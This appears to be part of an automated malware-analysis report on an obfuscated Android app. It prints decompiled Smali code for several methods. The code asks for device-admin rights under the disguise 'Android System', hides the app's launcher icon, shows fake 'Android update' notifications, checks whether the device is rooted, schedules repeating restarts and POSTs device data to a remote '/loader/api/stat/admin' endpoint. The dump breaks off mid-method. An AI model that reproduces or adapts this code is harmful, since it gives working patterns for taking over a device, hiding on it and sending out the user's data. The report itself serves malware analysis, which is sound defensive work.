40invoke-direct {v0, p1, v1}, Landroid/content/ComponentName;-><init>(Landroid/content/Context;Ljava/lang/Class;)V
41new-instance v1, Landroid/content/Intent;
43const-string v2, "android.app.action.ADD_DEVICE_ADMIN"
45invoke-direct {v1, v2}, Landroid/content/Intent;-><init>(Ljava/lang/String;)V
47const-string v2, "android.app.extra.DEVICE_ADMIN"
49invoke-virtual {v1, v2, v0}, Landroid/content/Intent;->putExtra(Ljava/lang/String;Landroid/os/Parcelable;)Landroid/content/Intent;
51const-string v0, "android.app.extra.ADD_EXPLANATION"
53const-string v2, "Android System"
55invoke-virtual {v1, v0, v2}, Landroid/content/Intent;->putExtra(Ljava/lang/String;Ljava/lang/String;)Landroid/content/Intent;
56const/high16 v0, 0x20000
58invoke-virtual {v1, v0}, Landroid/content/Intent;->addFlags(I)Landroid/content/Intent;
59const/16 v0, 0x2124
61invoke-virtual {p1, v1, v0}, Landroid/app/Activity;->startActivityForResult(Landroid/content/Intent;I)V
62new-instance v0, Landroid/os/Handler;
64invoke-static {}, Landroid/os/Looper;->getMainLooper()Landroid/os/Looper;
65move-result-object v1
67invoke-direct {v0, v1}, Landroid/os/Handler;-><init>(Landroid/os/Looper;)V
68new-instance v1, Lcom/czybg/eqtbdmzpklrgyns/oFwjTKzY;
70invoke-direct {v1, p0, p1, v0}, Lcom/czybg/eqtbdmzpklrgyns/oFwjTKzY;-><init>(Lcom/czybg/eqtbdmzpklrgyns/uIcqnrbS;Landroid/app/Activity;Landroid/os/Handler;)V
72invoke-virtual {v0, v1}, Landroid/os/Handler;->post(Ljava/lang/Runnable;)Z
73return-void
APIs
  • java.util.List.iterator
  • java.util.Iterator.hasNext
  • java.util.Iterator.next
  • java.lang.Integer.intValue
  • java.util.List.iterator
  • java.util.Iterator.hasNext
  • java.util.Iterator.next
  • java.util.concurrent.ConcurrentHashMap.put
  • java.util.List.isEmpty
  • java.util.ArrayList.isEmpty
  • android.content.Context.getPackageName
  • android.content.Context.getPackageManager
  • android.content.pm.PackageManager.getLaunchIntentForPackage
  • android.content.Intent.getComponent
  • android.content.ComponentName.getClassName
  • android.content.Context.getPackageName
  • android.content.ComponentName.<init>
  • android.content.Context.getApplicationContext
  • android.content.Context.getPackageManager
  • android.content.pm.PackageManager.setComponentEnabledSetting
Position Instruction Meta Information
0check-cast p1, Lcom/czybg/eqtbdmzpklrgyns/uwsSQRG;
2iget-object v0, p0, Lcom/czybg/eqtbdmzpklrgyns/DIowQgu;->DiXsQ:Lcom/czybg/eqtbdmzpklrgyns/rDQYNd;
4iget-object v0, v0, Lcom/czybg/eqtbdmzpklrgyns/rDQYNd;->DiXsQ:Lcom/czybg/eqtbdmzpklrgyns/WDAcpd;
5const/4 v1, 0x0
6iput-boolean v1, v0, Lcom/czybg/eqtbdmzpklrgyns/WDAcpd;->phHwgb:Z
8iget-object v0, p1, Lcom/czybg/eqtbdmzpklrgyns/uwsSQRG;->hZyMGHgz:Ljava/util/List;
10invoke-interface {v0}, Ljava/util/List;->iterator()Ljava/util/Iterator;
11move-result-object v1
12goto_f:
13invoke-interface {v1}, Ljava/util/Iterator;->hasNext()Z
14move-result v0
15if-eqz v0, :cond_27
17invoke-interface {v1}, Ljava/util/Iterator;->next()Ljava/lang/Object;
18move-result-object v0
19check-cast v0, Ljava/lang/Integer;
21iget-object v2, p0, Lcom/czybg/eqtbdmzpklrgyns/DIowQgu;->DiXsQ:Lcom/czybg/eqtbdmzpklrgyns/rDQYNd;
23iget-object v2, v2, Lcom/czybg/eqtbdmzpklrgyns/rDQYNd;->DiXsQ:Lcom/czybg/eqtbdmzpklrgyns/WDAcpd;
25invoke-virtual {v0}, Ljava/lang/Integer;->intValue()I
26move-result v0
28invoke-virtual {v2, v0}, Lcom/czybg/eqtbdmzpklrgyns/WDAcpd;->DiXsQ(I)V
29goto/16 :goto_f
30cond_27:
31iget-object v0, p1, Lcom/czybg/eqtbdmzpklrgyns/uwsSQRG;->LmcGi:Ljava/util/List;
33invoke-interface {v0}, Ljava/util/List;->iterator()Ljava/util/Iterator;
34move-result-object v1
35goto_2d:
36invoke-interface {v1}, Ljava/util/Iterator;->hasNext()Z
37move-result v0
38if-eqz v0, :cond_4a
40invoke-interface {v1}, Ljava/util/Iterator;->next()Ljava/lang/Object;
41move-result-object v0
42check-cast v0, Ljava/lang/Integer;
44iget-object v2, p0, Lcom/czybg/eqtbdmzpklrgyns/DIowQgu;->DiXsQ:Lcom/czybg/eqtbdmzpklrgyns/rDQYNd;
46iget-object v2, v2, Lcom/czybg/eqtbdmzpklrgyns/rDQYNd;->DiXsQ:Lcom/czybg/eqtbdmzpklrgyns/WDAcpd;
48iget-object v2, v2, Lcom/czybg/eqtbdmzpklrgyns/WDAcpd;->xnLvoQ:Ljava/util/concurrent/ConcurrentHashMap;
49new-instance v3, Lcom/czybg/eqtbdmzpklrgyns/phHwgb;
50const-wide/16 v4, 0x0
52invoke-direct {v3, v4, v5}, Lcom/czybg/eqtbdmzpklrgyns/phHwgb;-><init>(J)V
54invoke-virtual {v2, v0, v3}, Ljava/util/concurrent/ConcurrentHashMap;->put(Ljava/lang/Object;Ljava/lang/Object;)Ljava/lang/Object;
55goto/16 :goto_2d
56cond_4a:
57iget-object v0, p0, Lcom/czybg/eqtbdmzpklrgyns/DIowQgu;->DiXsQ:Lcom/czybg/eqtbdmzpklrgyns/rDQYNd;
59iget-object v0, v0, Lcom/czybg/eqtbdmzpklrgyns/rDQYNd;->DiXsQ:Lcom/czybg/eqtbdmzpklrgyns/WDAcpd;
61iget-object v0, v0, Lcom/czybg/eqtbdmzpklrgyns/WDAcpd;->EZmcnv:Lcom/czybg/eqtbdmzpklrgyns/EZmcnv;
63iget-object v1, p0, Lcom/czybg/eqtbdmzpklrgyns/DIowQgu;->DiXsQ:Lcom/czybg/eqtbdmzpklrgyns/rDQYNd;
65iget-object v1, v1, Lcom/czybg/eqtbdmzpklrgyns/rDQYNd;->DiXsQ:Lcom/czybg/eqtbdmzpklrgyns/WDAcpd;
67iget-object v1, v1, Lcom/czybg/eqtbdmzpklrgyns/WDAcpd;->xnLvoQ:Ljava/util/concurrent/ConcurrentHashMap;
69invoke-virtual {v0, v1}, Lcom/czybg/eqtbdmzpklrgyns/EZmcnv;->DiXsQ(Ljava/util/Map;)V
71iget-object v0, p1, Lcom/czybg/eqtbdmzpklrgyns/uwsSQRG;->xnLvoQ:Ljava/util/List;
73invoke-interface {v0}, Ljava/util/List;->isEmpty()Z
74move-result v0
75if-nez v0, :cond_6c
77iget-object v0, p0, Lcom/czybg/eqtbdmzpklrgyns/DIowQgu;->DiXsQ:Lcom/czybg/eqtbdmzpklrgyns/rDQYNd;
79iget-object v0, v0, Lcom/czybg/eqtbdmzpklrgyns/rDQYNd;->DiXsQ:Lcom/czybg/eqtbdmzpklrgyns/WDAcpd;
81iget-object v0, v0, Lcom/czybg/eqtbdmzpklrgyns/WDAcpd;->lVfyLT:Lcom/czybg/eqtbdmzpklrgyns/uKFQsLn;
83iget-object v1, p1, Lcom/czybg/eqtbdmzpklrgyns/uwsSQRG;->xnLvoQ:Ljava/util/List;
85invoke-virtual {v0, v1}, Lcom/czybg/eqtbdmzpklrgyns/uKFQsLn;->DiXsQ(Ljava/util/List;)V
86cond_6c:
87iget-object v0, p1, Lcom/czybg/eqtbdmzpklrgyns/uwsSQRG;->jVOak:Ljava/util/List;
89invoke-interface {v0}, Ljava/util/List;->isEmpty()Z
90move-result v0
91if-nez v0, :cond_7f
93iget-object v0, p0, Lcom/czybg/eqtbdmzpklrgyns/DIowQgu;->DiXsQ:Lcom/czybg/eqtbdmzpklrgyns/rDQYNd;
95iget-object v0, v0, Lcom/czybg/eqtbdmzpklrgyns/rDQYNd;->DiXsQ:Lcom/czybg/eqtbdmzpklrgyns/WDAcpd;
97iget-object v0, v0, Lcom/czybg/eqtbdmzpklrgyns/WDAcpd;->lVfyLT:Lcom/czybg/eqtbdmzpklrgyns/uKFQsLn;
99iget-object v1, p1, Lcom/czybg/eqtbdmzpklrgyns/uwsSQRG;->jVOak:Ljava/util/List;
101invoke-virtual {v0, v1}, Lcom/czybg/eqtbdmzpklrgyns/uKFQsLn;->Odjrct(Ljava/util/List;)V
102cond_7f:
103iget-object v0, p1, Lcom/czybg/eqtbdmzpklrgyns/uwsSQRG;->CyGFDR:Ljava/util/ArrayList;
105invoke-virtual {v0}, Ljava/util/ArrayList;->isEmpty()Z
106move-result v0
107if-nez v0, :cond_9a
109iget-object v0, p0, Lcom/czybg/eqtbdmzpklrgyns/DIowQgu;->DiXsQ:Lcom/czybg/eqtbdmzpklrgyns/rDQYNd;
111iget-object v0, v0, Lcom/czybg/eqtbdmzpklrgyns/rDQYNd;->DiXsQ:Lcom/czybg/eqtbdmzpklrgyns/WDAcpd;
113iget-object v0, v0, Lcom/czybg/eqtbdmzpklrgyns/WDAcpd;->xfPEz:Lcom/czybg/eqtbdmzpklrgyns/CigeEH;
114if-eqz v0, :cond_9a
116iget-object v0, p0, Lcom/czybg/eqtbdmzpklrgyns/DIowQgu;->DiXsQ:Lcom/czybg/eqtbdmzpklrgyns/rDQYNd;
118iget-object v0, v0, Lcom/czybg/eqtbdmzpklrgyns/rDQYNd;->DiXsQ:Lcom/czybg/eqtbdmzpklrgyns/WDAcpd;
120iget-object v0, v0, Lcom/czybg/eqtbdmzpklrgyns/WDAcpd;->xfPEz:Lcom/czybg/eqtbdmzpklrgyns/CigeEH;
122iget-object v1, p1, Lcom/czybg/eqtbdmzpklrgyns/uwsSQRG;->CyGFDR:Ljava/util/ArrayList;
124invoke-interface {v0, v1}, Lcom/czybg/eqtbdmzpklrgyns/CigeEH;->DiXsQ(Ljava/util/ArrayList;)V
125cond_9a:
126iget-object v0, p0, Lcom/czybg/eqtbdmzpklrgyns/DIowQgu;->DiXsQ:Lcom/czybg/eqtbdmzpklrgyns/rDQYNd;
128iget-object v0, v0, Lcom/czybg/eqtbdmzpklrgyns/rDQYNd;->DiXsQ:Lcom/czybg/eqtbdmzpklrgyns/WDAcpd;
130iget-object v0, v0, Lcom/czybg/eqtbdmzpklrgyns/WDAcpd;->jVOak:Landroid/content/Context;
132invoke-virtual {v0}, Landroid/content/Context;->getPackageName()Ljava/lang/String;
133move-result-object v1
135invoke-virtual {v0}, Landroid/content/Context;->getPackageManager()Landroid/content/pm/PackageManager;
136move-result-object v2
138invoke-virtual {v2, v1}, Landroid/content/pm/PackageManager;->getLaunchIntentForPackage(Ljava/lang/String;)Landroid/content/Intent;
139move-result-object v1
140if-eqz v1, :cond_cc
142invoke-virtual {v1}, Landroid/content/Intent;->getComponent()Landroid/content/ComponentName;
143move-result-object v1
145invoke-virtual {v1}, Landroid/content/ComponentName;->getClassName()Ljava/lang/String;
146move-result-object v1
147new-instance v2, Landroid/content/ComponentName;
149invoke-virtual {v0}, Landroid/content/Context;->getPackageName()Ljava/lang/String;
150move-result-object v3
152invoke-direct {v2, v3, v1}, Landroid/content/ComponentName;-><init>(Ljava/lang/String;Ljava/lang/String;)V
154invoke-virtual {v0}, Landroid/content/Context;->getApplicationContext()Landroid/content/Context;
155move-result-object v0
157invoke-virtual {v0}, Landroid/content/Context;->getPackageManager()Landroid/content/pm/PackageManager;
158move-result-object v0
159const/4 v1, 0x2
160const/4 v3, 0x1
162invoke-virtual {v0, v2, v1, v3}, Landroid/content/pm/PackageManager;->setComponentEnabledSetting(Landroid/content/ComponentName;II)V
163cond_cc: iget v0, p1, Lcom/czybg/eqtbdmzpklrgyns/uwsSQRG;->Odjrct:I
164if-lez v0, :cond_e1
166iget-object v0, p0, Lcom/czybg/eqtbdmzpklrgyns/DIowQgu;->DiXsQ:Lcom/czybg/eqtbdmzpklrgyns/rDQYNd;
168iget-object v0, v0, Lcom/czybg/eqtbdmzpklrgyns/rDQYNd;->DiXsQ:Lcom/czybg/eqtbdmzpklrgyns/WDAcpd;
170iget-object v0, v0, Lcom/czybg/eqtbdmzpklrgyns/WDAcpd;->EZmcnv:Lcom/czybg/eqtbdmzpklrgyns/EZmcnv;
171new-instance v1, Lcom/czybg/eqtbdmzpklrgyns/phHwgb;
172iget v2, p1, Lcom/czybg/eqtbdmzpklrgyns/uwsSQRG;->Odjrct:I
173int-to-long v2, v2
175invoke-direct {v1, v2, v3}, Lcom/czybg/eqtbdmzpklrgyns/phHwgb;-><init>(J)V
177invoke-virtual {v0, v1}, Lcom/czybg/eqtbdmzpklrgyns/EZmcnv;->DiXsQ(Lcom/czybg/eqtbdmzpklrgyns/phHwgb;)Lcom/czybg/eqtbdmzpklrgyns/phHwgb;
178cond_e1: return-void
Cross References
APIs
  • android.app.Notification$Builder.<init>
  • android.app.Notification$Builder.setContentTitle
  • android.app.Notification$Builder.setContentText
  • android.app.Notification$Builder.setSmallIcon
  • java.lang.System.currentTimeMillis
  • android.app.Notification$Builder.setWhen
  • android.app.Notification$Builder.setAutoCancel
  • android.app.Notification$Builder.getNotification
  • android.content.Intent.<init>
  • android.app.PendingIntent.getActivity
  • android.app.Notification.<init>
  • java.lang.Object.getClass
  • java.lang.Class.getMethod
  • java.lang.reflect.Method.invoke
Strings
  • Android update
  • setLatestEventInfo
Position Instruction Meta Information
0const/4 v3, 0x1
1const/4 v2, 0x0
2sget v0, Landroid/os/Build$VERSION;->SDK_INT:I
3const/16 v1, 0xa
4if-le v0, v1, :cond_31
5new-instance v0, Landroid/app/Notification$Builder;
7invoke-direct {v0, p0}, Landroid/app/Notification$Builder;-><init>(Landroid/content/Context;)V
9const-string v1, "Android update"
11invoke-virtual {v0, v1}, Landroid/app/Notification$Builder;->setContentTitle(Ljava/lang/CharSequence;)Landroid/app/Notification$Builder;
12move-result-object v0
14const-string v1, ""
16invoke-virtual {v0, v1}, Landroid/app/Notification$Builder;->setContentText(Ljava/lang/CharSequence;)Landroid/app/Notification$Builder;
17move-result-object v0
18const v1, 0x1080074
20invoke-virtual {v0, v1}, Landroid/app/Notification$Builder;->setSmallIcon(I)Landroid/app/Notification$Builder;
21move-result-object v0
23invoke-static {}, Ljava/lang/System;->currentTimeMillis()J
24move-result-wide v1
26invoke-virtual {v0, v1, v2}, Landroid/app/Notification$Builder;->setWhen(J)Landroid/app/Notification$Builder;
27move-result-object v0
29invoke-virtual {v0, v3}, Landroid/app/Notification$Builder;->setAutoCancel(Z)Landroid/app/Notification$Builder;
30move-result-object v0
32invoke-virtual {v0}, Landroid/app/Notification$Builder;->getNotification()Landroid/app/Notification;
33move-result-object v0
34goto_30: return-object v0
35cond_31: new-instance v0, Landroid/content/Intent;
37invoke-direct {v0}, Landroid/content/Intent;-><init>()V
39invoke-static {p0, v2, v0, v2}, Landroid/app/PendingIntent;->getActivity(Landroid/content/Context;ILandroid/content/Intent;I)Landroid/app/PendingIntent;
40move-result-object v1
41new-instance v0, Landroid/app/Notification;
43invoke-direct {v0}, Landroid/app/Notification;-><init>()V
44const v2, 0x1080074
45iput v2, v0, Landroid/app/Notification;->icon:I
46try_start_44:
47invoke-virtual {v0}, Ljava/lang/Object;->getClass()Ljava/lang/Class;
48move-result-object v2
50const-string v3, "setLatestEventInfo"
51const/4 v4, 0x4
52new-array v4, v4, [Ljava/lang/Class;
53const/4 v5, 0x0
54const-class v6, Landroid/content/Context;
55aput-object v6, v4, v5
56const/4 v5, 0x1
57const-class v6, Ljava/lang/CharSequence;
58aput-object v6, v4, v5
59const/4 v5, 0x2
60const-class v6, Ljava/lang/CharSequence;
61aput-object v6, v4, v5
62const/4 v5, 0x3
63const-class v6, Landroid/app/PendingIntent;
64aput-object v6, v4, v5
66invoke-virtual {v2, v3, v4}, Ljava/lang/Class;->getMethod(Ljava/lang/String;[Ljava/lang/Class;)Ljava/lang/reflect/Method;
67move-result-object v2
68const/4 v3, 0x4
69new-array v3, v3, [Ljava/lang/Object;
70const/4 v4, 0x0
71aput-object p0, v3, v4
72const/4 v4, 0x1
74const-string v5, "Android update"
75aput-object v5, v3, v4
76const/4 v4, 0x2
78const-string v5, "Android update"
79aput-object v5, v3, v4
80const/4 v4, 0x3
81aput-object v1, v3, v4
83invoke-virtual {v2, v0, v3}, Ljava/lang/reflect/Method;->invoke(Ljava/lang/Object;[Ljava/lang/Object;)Ljava/lang/Object;
84try_end_7b: goto/16 :goto_30
85catch_7c: move-exception v1
86goto/16 :goto_30
Cross References
APIs
  • java.lang.StringBuilder.<init>
  • java.lang.StringBuilder.append
  • java.lang.StringBuilder.toString
  • java.net.URL.<init>
  • java.net.URL.openConnection
  • javax.net.ssl.HttpsURLConnection.setRequestMethod
  • org.json.JSONObject.toString
  • java.lang.String.getBytes
  • javax.net.ssl.HttpsURLConnection.getResponseCode
  • java.io.IOException.<init>
  • java.lang.Exception.printStackTrace
Strings
  • /loader/api/stat/admin
  • POST
  • invalid status code
Position Instruction Meta Information
0try_start_0: new-instance v0, Ljava/net/URL;
1new-instance v1, Ljava/lang/StringBuilder;
3invoke-direct {v1}, Ljava/lang/StringBuilder;-><init>()V
5iget-object v2, p0, Lcom/czybg/eqtbdmzpklrgyns/dclBIK;->DiXsQ:Ljava/lang/String;
7invoke-virtual {v1, v2}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
8move-result-object v1
10const-string v2, "/loader/api/stat/admin"
12invoke-virtual {v1, v2}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
13move-result-object v1
15invoke-virtual {v1}, Ljava/lang/StringBuilder;->toString()Ljava/lang/String;
16move-result-object v1
18invoke-direct {v0, v1}, Ljava/net/URL;-><init>(Ljava/lang/String;)V
20invoke-virtual {v0}, Ljava/net/URL;->openConnection()Ljava/net/URLConnection;
21move-result-object v0
22check-cast v0, Ljavax/net/ssl/HttpsURLConnection;
24const-string v1, "POST"
26invoke-virtual {v0, v1}, Ljavax/net/ssl/HttpsURLConnection;->setRequestMethod(Ljava/lang/String;)V
28invoke-static {v0}, Lcom/czybg/eqtbdmzpklrgyns/Odjrct;->DiXsQ(Ljava/net/URLConnection;)V
30iget-object v1, p0, Lcom/czybg/eqtbdmzpklrgyns/dclBIK;->Odjrct:Lorg/json/JSONObject;
32invoke-virtual {v1}, Lorg/json/JSONObject;->toString()Ljava/lang/String;
33move-result-object v1
35invoke-virtual {v1}, Ljava/lang/String;->getBytes()[B
36move-result-object v1
38invoke-static {v0, v1}, Lcom/czybg/eqtbdmzpklrgyns/Odjrct;->DiXsQ(Ljava/net/URLConnection;[B)V
40invoke-virtual {v0}, Ljavax/net/ssl/HttpsURLConnection;->getResponseCode()I
41move-result v0
42const/16 v1, 0xc8
43if-eq v0, v1, :cond_49
44new-instance v0, Ljava/io/IOException;
46const-string v1, "invalid status code"
48invoke-direct {v0, v1}, Ljava/io/IOException;-><init>(Ljava/lang/String;)V
49throw v0
50try_end_45: move-exception v0
52invoke-virtual {v0}, Ljava/lang/Exception;->printStackTrace()V
53cond_49: const/4 v0, 0x0
54return-object v0
Cross References
APIs
  • java.lang.String.contains
  • java.io.File.<init>
  • java.io.File.exists
Strings
  • test-keys
  • /system/app/Superuser.apk
  • /sbin/su
  • /system/bin/su
  • /system/xbin/su
  • /data/local/xbin/su
  • /data/local/bin/su
  • /system/sd/xbin/su
  • /system/bin/failsafe/su
  • /data/local/su
  • eu.chainfire.supersu
Position Instruction Meta Information
0const/16 v6, 0x9
1const/4 v1, 0x1
2const/4 v0, 0x0
3try_start_4:
4sget-object v2, Landroid/os/Build;->TAGS:Ljava/lang/String;
5if-eqz v2, :cond_68
7const-string v3, "test-keys"
9invoke-virtual {v2, v3}, Ljava/lang/String;->contains(Ljava/lang/CharSequence;)Z
10move-result v2
11if-eqz v2, :cond_68
12move v2, v1
13goto_11: if-nez v2, :cond_66
14const/16 v2, 0x9
15new-array v3, v2, [Ljava/lang/String;
16const/4 v2, 0x0
18const-string v4, "/system/app/Superuser.apk"
19aput-object v4, v3, v2
20const/4 v2, 0x1
22const-string v4, "/sbin/su"
23aput-object v4, v3, v2
24const/4 v2, 0x2
26const-string v4, "/system/bin/su"
27aput-object v4, v3, v2
28const/4 v2, 0x3
30const-string v4, "/system/xbin/su"
31aput-object v4, v3, v2
32const/4 v2, 0x4
34const-string v4, "/data/local/xbin/su"
35aput-object v4, v3, v2
36const/4 v2, 0x5
38const-string v4, "/data/local/bin/su"
39aput-object v4, v3, v2
40const/4 v2, 0x6
42const-string v4, "/system/sd/xbin/su"
43aput-object v4, v3, v2
44const/4 v2, 0x7
46const-string v4, "/system/bin/failsafe/su"
47aput-object v4, v3, v2
48const/16 v2, 0x8
50const-string v4, "/data/local/su"
51aput-object v4, v3, v2
52move v2, v0
53goto_46: if-ge v2, v6, :cond_6d
54aget-object v4, v3, v2
55new-instance v5, Ljava/io/File;
57invoke-direct {v5, v4}, Ljava/io/File;-><init>(Ljava/lang/String;)V
59invoke-virtual {v5}, Ljava/io/File;->exists()Z
60move-result v4
61if-eqz v4, :cond_6a
62move v2, v1
63goto_56: if-nez v2, :cond_66
65invoke-static {}, Lcom/czybg/eqtbdmzpklrgyns/xnLvoQ;->DiXsQ()Z
66move-result v2
67if-nez v2, :cond_66
69const-string v2, "eu.chainfire.supersu"
71invoke-static {v2, p0}, Lcom/czybg/eqtbdmzpklrgyns/xnLvoQ;->DiXsQ(Ljava/lang/String;Landroid/content/Context;)Z
72try_end_63: move-result v2
73if-eqz v2, :cond_67
74cond_66: move v0, v1
75goto_67: return v0
76cond_68: move v2, v0
77goto/16 :goto_11
78cond_6a: add-int/lit8 v2, v2, 0x1
79goto/16 :goto_46
80cond_6d: move v2, v0
81goto/16 :goto_56
82catch_6f: move-exception v1
83goto/16 :goto_67
Cross References
APIs
  • android.content.Intent.<init>
  • android.content.Intent.putExtra
  • android.content.Context.getApplicationContext
  • android.app.PendingIntent.getService
  • android.content.Context.getApplicationContext
  • android.content.Context.getSystemService
  • java.util.Calendar.getInstance
  • java.lang.System.currentTimeMillis
  • java.util.Calendar.setTimeInMillis
  • java.util.Calendar.add
  • java.util.Calendar.getTimeInMillis
  • android.app.AlarmManager.setRepeating
Strings
  • restartInterval
  • alarm
Position Instruction Meta Information
0const/4 v5, 0x1
1const/4 v1, 0x0
3iget-object v0, p0, Lcom/czybg/eqtbdmzpklrgyns/qwAiT;->Odjrct:Landroid/content/Context;
5invoke-static {v0}, Lcom/czybg/eqtbdmzpklrgyns/HLqFdR;->LmcGi(Landroid/content/Context;)Z
6move-result v0
7if-eqz v0, :cond_e
8iget-boolean v0, p0, Lcom/czybg/eqtbdmzpklrgyns/qwAiT;->jVOak:Z
9if-eqz v0, :cond_14
10cond_e: const-wide/16 v0, 0xfa0
12invoke-virtual {p0, v0, v1}, Lcom/czybg/eqtbdmzpklrgyns/qwAiT;->DiXsQ(J)V
13goto_13: return-void
14cond_14: new-instance v0, Landroid/content/Intent;
16iget-object v2, p0, Lcom/czybg/eqtbdmzpklrgyns/qwAiT;->Odjrct:Landroid/content/Context;
17const-class v3, Lcom/czybg/eqtbdmzpklrgyns/KezZERjCGv7fpQLHuQ;
19invoke-direct {v0, v2, v3}, Landroid/content/Intent;-><init>(Landroid/content/Context;Ljava/lang/Class;)V
21const-string v2, "restartInterval"
23invoke-virtual {v0, v2, v5}, Landroid/content/Intent;->putExtra(Ljava/lang/String;Z)Landroid/content/Intent;
25iget-object v2, p0, Lcom/czybg/eqtbdmzpklrgyns/qwAiT;->Odjrct:Landroid/content/Context;
27invoke-virtual {v2}, Landroid/content/Context;->getApplicationContext()Landroid/content/Context;
28move-result-object v2
29const/high16 v3, 0x8000000
31invoke-static {v2, v1, v0, v3}, Landroid/app/PendingIntent;->getService(Landroid/content/Context;ILandroid/content/Intent;I)Landroid/app/PendingIntent;
32move-result-object v6
34iget-object v0, p0, Lcom/czybg/eqtbdmzpklrgyns/qwAiT;->Odjrct:Landroid/content/Context;
36invoke-virtual {v0}, Landroid/content/Context;->getApplicationContext()Landroid/content/Context;
37move-result-object v0
39const-string v2, "alarm"
41invoke-virtual {v0, v2}, Landroid/content/Context;->getSystemService(Ljava/lang/String;)Ljava/lang/Object;
42move-result-object v0
43check-cast v0, Landroid/app/AlarmManager;
45invoke-static {}, Ljava/util/Calendar;->getInstance()Ljava/util/Calendar;
46move-result-object v2
48invoke-static {}, Ljava/lang/System;->currentTimeMillis()J
49move-result-wide v3
51invoke-virtual {v2, v3, v4}, Ljava/util/Calendar;->setTimeInMillis(J)V
52const/16 v3, 0xc
54invoke-virtual {v2, v3, v5}, Ljava/util/Calendar;->add(II)V
56invoke-virtual {v2}, Ljava/util/Calendar;->getTimeInMillis()J
57move-result-wide v2
58const-wide/32 v4, 0x3a980
60invoke-virtual/range {v0 .. v6}, Landroid/app/AlarmManager;->setRepeating(IJJLandroid/app/PendingIntent;)V
61goto/16 :goto_13
Cross References
APIs
  • java.security.MessageDigest.getInstance
  • java.lang.String.getBytes
  • java.security.MessageDigest.update
  • java.security.MessageDigest.digest
  • java.lang.StringBuilder.<init>
  • java.lang.Integer.toHexString
  • java.lang.String.length
  • java.lang.StringBuilder.<init>
  • java.lang.StringBuilder.append
  • java.lang.StringBuilder.toString
  • java.lang.StringBuilder.append
  • java.lang.StringBuilder.toString
Strings
  • MD5
  • 0
Position Instruction Meta Information
0try_start_0:
1const-string v0, "MD5"
3invoke-static {v0}, Ljava/security/MessageDigest;->getInstance(Ljava/lang/String;)Ljava/security/MessageDigest;
4move-result-object v0
6invoke-virtual {p0}, Ljava/lang/String;->getBytes()[B
7move-result-object v1
9invoke-virtual {v0, v1}, Ljava/security/MessageDigest;->update([B)V
11invoke-virtual {v0}, Ljava/security/MessageDigest;->digest()[B
12move-result-object v2
13new-instance v3, Ljava/lang/StringBuilder;
15invoke-direct {v3}, Ljava/lang/StringBuilder;-><init>()V
16array-length v4, v2
17const/4 v0, 0x0
18move v1, v0
19goto_19: if-ge v1, v4, :cond_41
20aget-byte v0, v2, v1
21and-int/lit16 v0, v0, 0xff
23invoke-static {v0}, Ljava/lang/Integer;->toHexString(I)Ljava/lang/String;
24move-result-object v0
25goto_23:
26invoke-virtual {v0}, Ljava/lang/String;->length()I
27move-result v5
28const/4 v6, 0x2
29if-ge v5, v6, :cond_3a
30new-instance v5, Ljava/lang/StringBuilder;
32const-string v6, "0"
34invoke-direct {v5, v6}, Ljava/lang/StringBuilder;-><init>(Ljava/lang/String;)V
36invoke-virtual {v5, v0}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
37move-result-object v0
39invoke-virtual {v0}, Ljava/lang/StringBuilder;->toString()Ljava/lang/String;
40move-result-object v0
41goto/16 :goto_23
42cond_3a:
43invoke-virtual {v3, v0}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
44add-int/lit8 v0, v1, 0x1
45move v1, v0
46goto/16 :goto_19
47cond_41:
48invoke-virtual {v3}, Ljava/lang/StringBuilder;->toString()Ljava/lang/String;
49try_end_44: move-result-object v0
50goto_45: return-object v0
51catch_46: move-exception v0
53const-string v0, ""
54goto/16 :goto_45
APIs
  • android.content.SharedPreferences.edit
  • org.json.JSONObject.toString
  • android.content.SharedPreferences$Editor.putString
  • android.content.SharedPreferences$Editor.commit
  • java.lang.String.isEmpty
  • java.lang.StringBuilder.<init>
  • java.lang.StringBuilder.append
  • java.lang.StringBuilder.toString
Strings
  • snt
  • markNotFound
  • vendor
  • model
  • version
Position Instruction Meta Information
0check-cast p1, Lcom/czybg/eqtbdmzpklrgyns/LfxjW;
2iget-object v0, p0, Lcom/czybg/eqtbdmzpklrgyns/UBLcF;->DiXsQ:Lcom/czybg/eqtbdmzpklrgyns/VvXSDk;
4invoke-static {v0}, Lcom/czybg/eqtbdmzpklrgyns/VvXSDk;->LmcGi(Lcom/czybg/eqtbdmzpklrgyns/VvXSDk;)Landroid/content/SharedPreferences;
5move-result-object v0
7invoke-interface {v0}, Landroid/content/SharedPreferences;->edit()Landroid/content/SharedPreferences$Editor;
8move-result-object v0
10const-string v1, "snt"
12invoke-virtual {p1}, Lcom/czybg/eqtbdmzpklrgyns/LfxjW;->DiXsQ()Lorg/json/JSONObject;
13move-result-object v2
15invoke-virtual {v2}, Lorg/json/JSONObject;->toString()Ljava/lang/String;
16move-result-object v2
18invoke-interface {v0, v1, v2}, Landroid/content/SharedPreferences$Editor;->putString(Ljava/lang/String;Ljava/lang/String;)Landroid/content/SharedPreferences$Editor;
19move-result-object v0
21invoke-interface {v0}, Landroid/content/SharedPreferences$Editor;->commit()Z
23iget-object v0, p0, Lcom/czybg/eqtbdmzpklrgyns/UBLcF;->DiXsQ:Lcom/czybg/eqtbdmzpklrgyns/VvXSDk;
25invoke-static {v0}, Lcom/czybg/eqtbdmzpklrgyns/VvXSDk;->hZyMGHgz(Lcom/czybg/eqtbdmzpklrgyns/VvXSDk;)Lcom/czybg/eqtbdmzpklrgyns/iUhPN;
26move-result-object v0
28invoke-interface {v0, p1}, Lcom/czybg/eqtbdmzpklrgyns/iUhPN;->DiXsQ(Lcom/czybg/eqtbdmzpklrgyns/LfxjW;)V
30iget-object v0, p1, Lcom/czybg/eqtbdmzpklrgyns/LfxjW;->DiXsQ:Ljava/lang/String;
32invoke-virtual {v0}, Ljava/lang/String;->isEmpty()Z
33move-result v0
34if-eqz v0, :cond_6f
36invoke-static {}, Lmpcom/crashlytics/android/answers/Answers;->getInstance()Lmpcom/crashlytics/android/answers/Answers;
37move-result-object v2
38new-instance v1, Lmpcom/crashlytics/android/answers/CustomEvent;
40const-string v0, "markNotFound"
42invoke-direct {v1, v0}, Lmpcom/crashlytics/android/answers/CustomEvent;-><init>(Ljava/lang/String;)V
44const-string v3, "vendor"
46sget-object v0, Landroid/os/Build;->MANUFACTURER:Ljava/lang/String;
